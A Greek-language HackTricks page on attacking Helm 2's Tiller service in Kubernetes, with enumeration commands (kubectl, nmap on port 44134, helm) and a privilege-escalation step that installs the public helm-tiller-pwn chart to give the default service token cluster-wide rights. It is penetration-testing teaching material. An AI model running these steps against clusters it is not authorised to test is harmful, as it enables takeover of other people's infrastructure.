7.4 KiB
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές Πληροφορίες
Το Helm είναι ο διαχειριστής πακέτων για το Kubernetes. Επιτρέπει την συσκευασία των αρχείων YAML και τη διανομή τους σε δημόσιους και ιδιωτικούς αποθετήριους. Αυτά τα πακέτα ονομάζονται Helm Charts. Ο Tiller είναι ο υπηρεσία που τρέχει από προεπιλογή στη θύρα 44134 προσφέροντας την υπηρεσία.
Προεπιλεγμένη θύρα: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
Απαρίθμηση
Εάν μπορείτε να απαριθμήσετε τα pods και/ή τις υπηρεσίες διαφορετικών namespaces, απαριθμήστε τα και αναζητήστε αυτά που έχουν τη λέξη "tiller" στο όνομά τους:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Παραδείγματα:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
Μπορείτε επίσης να προσπαθήσετε να βρείτε αυτήν την υπηρεσία ελέγχοντας τη θύρα 44134:
sudo nmap -sS -p 44134 <IP>
Αφού το ανακαλύψετε, μπορείτε να επικοινωνήσετε με αυτό κατεβάζοντας την εφαρμογή πελάτη helm. Μπορείτε να χρησιμοποιήσετε εργαλεία όπως το homebrew
, ή να κοιτάξετε την επίσημη σελίδα κυκλοφοριών. Για περισσότερες λεπτομέρειες ή για άλλες επιλογές, δείτε ο οδηγός εγκατάστασης.
Στη συνέχεια, μπορείτε να απαριθμήσετε την υπηρεσία:
helm --host tiller-deploy.kube-system:44134 version
Ανόδου Προνομίων
Από προεπιλογή, το Helm2 είναι εγκατεστημένο στο namespace kube-system με υψηλά προνόμια, οπότε αν βρείτε την υπηρεσία και έχετε πρόσβαση σε αυτήν, αυτό μπορεί να σας επιτρέψει να αναβαθμίσετε τα προνόμια.
Το μόνο που χρειάζεται να κάνετε είναι να εγκαταστήσετε ένα πακέτο όπως αυτό: https://github.com/Ruil1n/helm-tiller-pwn που θα δώσει στο προεπιλεγμένο διακριτικό υπηρεσίας πρόσβαση σε όλο το cluster.
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
Στο http://rui0.cn/archives/1573 έχετε την εξήγηση της επίθεσης, αλλά βασικά, αν διαβάσετε τα αρχεία clusterrole.yaml και clusterrolebinding.yaml μέσα στον φάκελο helm-tiller-pwn/pwnchart/templates/ μπορείτε να δείτε πώς δίνονται όλα τα προνόμια στο προεπιλεγμένο token.
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.